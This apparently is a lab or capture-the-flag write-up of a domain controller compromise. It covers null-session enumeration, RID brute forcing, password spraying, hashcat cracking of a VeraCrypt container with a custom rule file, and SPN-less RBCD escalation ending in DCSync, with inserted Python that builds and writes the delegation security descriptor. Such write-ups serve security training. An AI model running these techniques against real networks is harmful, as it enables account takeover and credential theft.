Enumeration

Nmap

The initial Nmap scan showed SMB, LDAP, Kerberos and WinRM open. That combination of services is the usual fingerprint of a Domain Controller.

000 - nmap out

DNS Enumeration

DNS enumeration against the domain returned the FQDN of the Domain Controller.

001 - dc

SMB Enumeration

SMB enumeration showed that a NULL session is accepted and that the Public share is readable with it. Inside the Public share was an email containing a PDF attachment as a base64-encoded blob.

002 - public share

Opening The PDF

Decoded it with echo '<base64 blob from the email>' | base64 -d > welcome.pdf and opened the PDF, which revealed the default password.

003 - default password

RID Brute

Because the NULL session also gives access to the IPC$ share, RID cycling (RID brute forcing) can be used to turn the domain SID plus sequential RIDs into a list of valid user names.

004 - brute forcing RIDs to get a list of users

Exploitation

Password Spraying

Using the default password from the PDF and the user list from RID cycling, I sprayed the single password against every user and obtained a valid set of credentials.

005 - valid creds

SMB Enumeration

Using the new credentials, I enumerated the SMB shares again, which showed that this user has access to the Department share.

006 - department shares

Encrypted .hc File

Inside the Department share was an IT backup with a .hc extension, i.e. a VeraCrypt container. VeraCrypt can open it but asks for a password, so the route is to attack the volume header offline with hashcat.

The lab hints: 'Should you need to crack a hash, use a short custom wordlist based on company name & simple mutation rules commonly seen in real life passwords (e.g. year & a special character).' The hint matters here: VeraCrypt derives its header key with several hundred thousand PBKDF2 iterations, so every candidate is expensive and a large wordlist is not realistic. I ran:

hashcat -m 13721 IT_BACKUP_201123.hc phantom -r rules

Here 13721 is the VeraCrypt SHA-512 + XTS 512-bit mode, phantom is a one-word wordlist holding the company name, and rules is the rule file below. Two checks if this does not crack: hashcat takes the volume header from the first 512 bytes of the file (a hidden volume's header sits at offset 65536 instead), and the header does not reveal which hash the container was created with, so a miss with 13721 may need a retry with the sibling modes (13711 RIPEMD-160, 13731 Whirlpool, 13751 SHA-256, 13771 Streebog; the 1024/1536-bit variants are for cascaded ciphers).

The rule file looked like this:

# Basic transformations
:
l
u
c
C

# Add common years at the end (2020-2025)
$2$0$2$5
$2$0$2$4
$2$0$2$3
$2$0$2$2
$2$0$2$1
$2$0$2$0

# Add years with common special characters (2020-2025)
$2$0$2$5$!
$2$0$2$4$!
$2$0$2$3$!
$2$0$2$2$!
$2$0$2$1$!
$2$0$2$0$!
$2$0$2$5$@
$2$0$2$4$@
$2$0$2$3$@
$2$0$2$2$@
$2$0$2$1$@
$2$0$2$0$@
$2$0$2$5$#
$2$0$2$4$#
$2$0$2$3$#
$2$0$2$2$#
$2$0$2$1$#
$2$0$2$0$#
$2$0$2$5$$
$2$0$2$4$$
$2$0$2$3$$
$2$0$2$2$$
$2$0$2$1$$
$2$0$2$0$$

# Capitalize first letter + years + special chars (2020-2025)
c $2$0$2$5$!
c $2$0$2$4$!
c $2$0$2$3$!
c $2$0$2$2$!
c $2$0$2$1$!
c $2$0$2$0$!

# All uppercase + years + special chars (2020-2025)
u $2$0$2$5$!
u $2$0$2$4$!
u $2$0$2$3$!
u $2$0$2$2$!
u $2$0$2$1$!
u $2$0$2$0$!

# Prepend special characters, with 2025 appended
^! $2$0$2$5
^@ $2$0$2$5
^# $2$0$2$5
^$ $2$0$2$5

# Common number substitutions (leet speak) (2020-2025)
so0 $2$0$2$5$!
so0 $2$0$2$4$!
so0 $2$0$2$3$!
so0 $2$0$2$2$!
so0 $2$0$2$1$!
so0 $2$0$2$0$!

# Replace 'a' with '@' (2020-2025)
sa@ $2$0$2$5$!
sa@ $2$0$2$4$!
sa@ $2$0$2$3$!
sa@ $2$0$2$2$!

# Replace 'a' with '4' (2020-2025)
sa4 $2$0$2$5$!
sa4 $2$0$2$4$!
sa4 $2$0$2$3$!
sa4 $2$0$2$2$!
sa4 $2$0$2$1$!
sa4 $2$0$2$0$!

# Multiple leet substitutions (a->4, o->0) (2020-2025)
sa4 so0 $2$0$2$5$!
sa4 so0 $2$0$2$4$!
sa4 so0 $2$0$2$3$!
sa4 so0 $2$0$2$2$!
sa4 so0 $2$0$2$1$!
sa4 so0 $2$0$2$0$!

# Capitalize first + leet substitutions (2020-2025)
c sa4 so0 $2$0$2$5$!
c sa4 so0 $2$0$2$4$!
c sa4 so0 $2$0$2$3$!
c sa4 so0 $2$0$2$2$!
c sa4 so0 $2$0$2$1$!
c sa4 so0 $2$0$2$0$!

# Multiple special characters (2020-2025)
$2$0$2$5$!$!
$2$0$2$4$!$!
$2$0$2$3$!$!
$2$0$2$5$@$!
$2$0$2$4$@$!
$2$0$2$3$@$!
$2$0$2$5$#$!
$2$0$2$4$#$!
$2$0$2$3$#$!

# Same candidates as the '$2$0$2$5$!' block above: hashcat ignores whitespace between functions, so these also append the year and '!' at the end (redundant rules)
$2$0 $2$5 $!
$2$0 $2$4 $!
$2$0 $2$3 $!
$2$0 $2$2 $!
$2$0 $2$1 $!
$2$0 $2$0 $!

# Short years (last two digits) (20-25)
$2$5$!
$2$4$!
$2$3$!
$2$2$!
$2$1$!
$2$0$!

# Combinations with multiple transformations (2020-2025)
c sa@ $2$0$2$5$!
c so0 $2$0$2$5$!
u sa@ $2$0$2$5$!
u so0 $2$0$2$5$!
c sa4 $2$0$2$5$!
c sa4 $2$0$2$4$!
u sa4 so0 $2$0$2$5$!
u sa4 so0 $2$0$2$4$!
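Before spending GPU time on a slow KDF it is worth knowing exactly which candidates a rule file produces. The following is an added example, not part of the original writeup and not hashcat's code: a small Python re-implementation of the subset of hashcat rule functions used above (:, l, u, c, C, $X, ^X, sXY, plus t, r, d), applied to a one-word wordlist. RULES_TEXT is a constructed subset of the rule file above, chosen to include the two spellings that yield the same candidate.

```python
RULES_TEXT = """\
# Constructed subset of the rule file above, including two rules that
# look different but produce the same candidate.
:
c
u
$2$0$2$5$!
c $2$0$2$5$!
^! $2$0$2$5
sa4 so0 $2$0$2$5$!
c sa4 so0 $2$0$2$5$!
$2$0 $2$5 $!
$2$5$!
$2$0$2$5$$
"""


def tokenize(rule: str):
    """Split one rule line into hashcat functions. Whitespace between
    functions is ignored, so '$2$0 $2$5 $!' equals '$2$0$2$5$!'."""
    i, n = 0, len(rule)
    while i < n:
        ch = rule[i]
        if ch.isspace():
            i += 1
            continue
        # $X and ^X take one argument, sXY takes two, the rest take none
        width = 2 if ch in '$^' else 3 if ch == 's' else 1 if ch in ':lucCtrd' else 0
        if width == 0:
            raise ValueError('unsupported rule function %r in %r' % (ch, rule))
        if i + width > n:
            raise ValueError('truncated rule function in %r' % rule)
        yield rule[i:i + width]
        i += width


def apply_rule(word: str, rule: str) -> str:
    """Apply the functions left to right, as hashcat's rule engine does."""
    for fn in tokenize(rule):
        op = fn[0]
        if op == 'l':
            word = word.lower()
        elif op == 'u':
            word = word.upper()
        elif op == 'c':          # capitalize first letter, lowercase the rest
            word = word[:1].upper() + word[1:].lower()
        elif op == 'C':          # lowercase first letter, uppercase the rest
            word = word[:1].lower() + word[1:].upper()
        elif op == 't':          # toggle case of every character
            word = word.swapcase()
        elif op == 'r':          # reverse
            word = word[::-1]
        elif op == 'd':          # duplicate
            word = word + word
        elif op == '$':          # append one character
            word = word + fn[1]
        elif op == '^':          # prepend one character
            word = fn[1] + word
        elif op == 's':          # replace every X with Y
            word = word.replace(fn[1], fn[2])
        # ':' is the no-op: the word passes through unchanged
    return word


def load_rules(text: str):
    """Rule file text -> list of rule lines, skipping blanks and '#' comments."""
    return [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith('#')]


def expand(words, rules):
    """Return (unique candidates in first-seen order, number of duplicates dropped)."""
    seen, out, dups = set(), [], 0
    for w in words:
        for r in rules:
            cand = apply_rule(w, r)
            if cand in seen:
                dups += 1
            else:
                seen.add(cand)
                out.append(cand)
    return out, dups


if __name__ == '__main__':
    cands, dups = expand(['phantom'], load_rules(RULES_TEXT))
    print('\n'.join(cands))
    print('%d unique candidates, %d duplicates dropped' % (len(cands), dups))
```

hashcat itself can do the same dry run with hashcat --stdout -r rules phantom, and piping that through sort -u | wc -l tells you how many distinct header-key derivations the attack will actually cost; duplicates like the whitespace-separated year rules are wasted iterations against a PBKDF2-protected header.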

hashcat recovered the password.

009 - cracked

With that password we can mount the container in VeraCrypt.

010 - veracrypt

The mounted volume held backup files, some SQL files and some config files. I first found an etc/shadow file and tried cracking its hashes, but nothing came out of it, and the SQL files held nothing useful either. One of the config files, however, contained a password:

011 - config boot

The password did not work for the user it was found with, so I sprayed it against the user list and found another valid credential, this time a service account.

012 - svc account

User Flag

User flag was obtained.

013 - user flag

Privilege Escalation

BloodHound

With that user, I collected BloodHound data to look for privilege escalation paths.

014 - bloodhound

RBCD on SPN-less users

The path was straightforward: the current user can force-change the passwords of three users, and those three users have AddAllowedToAct over the Domain Controller. So we can change one of their passwords, authenticate as that user, and apply resource-based constrained delegation (RBCD) against the DC.

015 - force change passw

016 - allowed to act

However, there was a problem: none of the users could add a machine account to the domain. I tested all three after changing their passwords, and ms-DS-MachineAccountQuota was 0.

017 - Update password

So we cannot create a machine account to use as the delegating principal. After some research I found a technique that performs RBCD with an SPN-less user account instead: the user's password is replaced by the session key of its own TGT, which lets the S4U2self/S4U2proxy exchange go through without an SPN. Note that this breaks the account: its password becomes a random key with no known plaintext, so the legitimate user can no longer log in with it.

For the details of RBCD on SPN-less users, see the write-up on The Hacker Recipes.

018 - RBCD on SPN-less users
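What the AddAllowedToAct edge actually permits is a write to msDS-AllowedToActOnBehalfOfOtherIdentity on the DC's computer object: a security descriptor whose DACL lists the principal allowed to delegate to the DC. With an SPN-less user, the SID in that ACE is the user's own SID instead of a machine account's. The following is an added example, not part of the original writeup and not impacket's code: it builds the self-relative security descriptor in pure Python with the same layout impacket's rbcd.py produces (owner BUILTIN\Administrators, one ACCESS_ALLOWED ACE with full control per SID, no group and no SACL), parses it back so the result can be checked, and shows the LDAP write. The SIDs are constructed placeholders, and write_rbcd assumes an already-bound ldap3 Connection.

```python
import struct

# Security-descriptor constants (MS-DTYP)
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION_DS = 4
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF   # the mask impacket's rbcd.py grants to the delegating account


def sid_to_bytes(sid: str) -> bytes:
    """Encode 'S-1-5-21-...' into the binary SID layout."""
    parts = sid.split('-')
    if parts[0] != 'S' or parts[1] != '1':
        raise ValueError('not a SID: %r' % sid)
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([1, len(subs)]) + authority.to_bytes(6, 'big')
            + b''.join(struct.pack('<I', s) for s in subs))


def bytes_to_sid(buf: bytes, off: int = 0):
    """Decode a binary SID at buf[off]; returns (sid_string, byte_length)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], 'big')
    subs = struct.unpack_from('<%dI' % count, buf, off + 8)
    return 'S-%d-%d%s' % (rev, authority, ''.join('-%d' % s for s in subs)), 8 + 4 * count


def build_rbcd_sd(allowed_sids, owner_sid='S-1-5-32-544') -> bytes:
    """Self-relative security descriptor with one ACCESS_ALLOWED ACE per SID.
    Owner is BUILTIN\\Administrators; group and SACL are absent (offset 0)."""
    aces = b''
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        # ACE header: type, flags, size, then the access mask and the SID
        aces += struct.pack('<BBHI', ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL) + sid_b
    dacl = struct.pack('<BBHHH', ACL_REVISION_DS, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(owner_sid)
    # 20-byte header: revision, sbz1, control, then offsets of owner, group, SACL, DACL
    header = struct.pack('<BBHIIII', 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         20, 0, 0, 20 + len(owner))
    return header + owner + dacl


def parse_rbcd_sd(sd: bytes) -> dict:
    """Inverse of build_rbcd_sd: owner SID and (type, mask, sid) of every DACL ACE.
    Use this on the attribute's current value before overwriting it."""
    _, _, control, off_owner, _, _, off_dacl = struct.unpack_from('<BBHIIII', sd, 0)
    owner = bytes_to_sid(sd, off_owner)[0] if off_owner else None
    aces = []
    if control & SE_DACL_PRESENT and off_dacl:
        _, _, _, ace_count, _ = struct.unpack_from('<BBHHH', sd, off_dacl)
        pos = off_dacl + 8
        for _ in range(ace_count):
            ace_type, _, ace_size, mask = struct.unpack_from('<BBHI', sd, pos)
            aces.append((ace_type, mask, bytes_to_sid(sd, pos + 8)[0]))
            pos += ace_size
    return {'control': control, 'owner': owner, 'aces': aces}


def write_rbcd(conn, target_dn: str, sd: bytes) -> bool:
    """Replace the attribute on the DC's computer object over an already-bound
    ldap3 Connection (assumed API; network call, not exercised offline)."""
    from ldap3 import MODIFY_REPLACE
    return conn.modify(target_dn,
                       {'msDS-AllowedToActOnBehalfOfOtherIdentity': [(MODIFY_REPLACE, [sd])]})


if __name__ == '__main__':
    # Constructed SID: made-up domain and RID for the SPN-less user we control.
    sd = build_rbcd_sd(['S-1-5-21-1111-2222-3333-1105'])
    print(len(sd), sd.hex())
    print(parse_rbcd_sd(sd))
```

MODIFY_REPLACE overwrites whatever was already in the attribute, so read and parse the existing value first and include its SIDs in allowed_sids if legitimate delegation must keep working; a missing or wrong ACE here is also the first thing to check when the later S4U2proxy request is refused.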

Got the Admin

Following the steps from that post, we obtained Domain Admin.

019 - got it

From there we can also DCSync to dump the domain's credential material.

020 - dcsync

Pwned

The machine was compromised.

021 - pwned
